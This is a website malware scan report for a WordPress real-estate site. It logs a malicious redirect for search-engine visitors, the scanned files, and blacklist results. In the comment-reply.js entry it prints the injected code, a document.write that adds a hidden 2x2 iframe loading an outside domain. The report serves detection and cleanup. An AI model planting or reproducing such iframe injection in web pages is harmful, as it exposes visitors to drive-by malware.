Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.open2viewqueensland.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.open2viewqueensland.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: no-cache, no-store, must-revalidate, max-age=0 Connection: close Date: Thu, 29 Jan 2015 00:42:33 GMT Location: http://veloresults.com/evdy.html?h=2274508 Server: LiteSpeed Content-Length: 1148 Content-Type: text/html | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.open2viewqueensland.com/ | 200 OK Content-Length: 17155 Content-Type: text/html | clean |
http://www.open2viewqueensland.com/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 94861 Content-Type: application/javascript | clean |
http://www.open2viewqueensland.com/wp-content/plugins/slimbox/javascript/jquery.slimbox.js?ver=2.03 | 200 OK Content-Length: 4202 Content-Type: application/javascript | clean |
http://www.open2viewqueensland.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.2 | 200 OK Content-Length: 927 Content-Type: application/javascript | clean |
http://www.open2viewqueensland.com/wp-content/themes/monochrome/js/scroll.js | 200 OK Content-Length: 618 Content-Type: application/javascript | clean |
http://www.open2viewqueensland.com/wp-content/themes/monochrome/js/jscript.js | 200 OK Content-Length: 4739 Content-Type: application/javascript | clean |
http://www.open2viewqueensland.com/wp-content/themes/monochrome/js/comment.js | 200 OK Content-Length: 2278 Content-Type: application/javascript | clean |
http://www.open2viewqueensland.com/about/ | 200 OK Content-Length: 12558 Content-Type: text/html | clean |
http://www.open2viewqueensland.com/wp-includes/js/comment-reply.js?ver=3.4.2 | 200 OK Content-Length: 946 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://veloresults.com/evdy.html?j=2274508></iframe>');
addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form-div"),o=n.I(n.respondId);if(!e||!o){return}n.I("comment_parent").value="0";e.parentNode.insertBefore(o,e);e.parentNode.removeChild(e);this.style.display="none";this.onclick=null;return false};try{m.I("comment").focus()}catch(g){}return false},I:function(a){return document.getElementById(a)}}; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://veloresults.com/evdy.html?j=2274508 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://veloresults.com/evdy.html?j=2274508> | ||
http://www.open2viewqueensland.com/franchise-opportunities/ | 200 OK Content-Length: 16218 Content-Type: text/html | clean |
http://www.open2viewqueensland.com/franchise-opportunities/otv_banner3-final-recuritment/ | 200 OK Content-Length: 12458 Content-Type: text/html | clean |
http://www.open2viewqueensland.com/wp-content/uploads/2012/06/OTV_banner3-final-recuritment.gif | 200 OK Content-Length: 14425 Content-Type: image/gif | clean |
http://www.open2viewqueensland.com/test404page.js | 404 Not Found Content-Length: 9391 Content-Type: text/html | clean |
http://www.open2viewqueensland.com/feed/ | 200 OK Content-Length: 8224 Content-Type: text/xml | clean |
http://www.open2viewqueensland.com/2011/07/22/what-would-you-like-to-see-in-our-blog/web-open2view-id87953-149_35-howard-street/ | 200 OK Content-Length: 13862 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=open2viewqueensland.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://open2viewqueensland.com/
Result: open2viewqueensland.com is not infected or malware details are not published yet.
Result: open2viewqueensland.com is not infected or malware details are not published yet.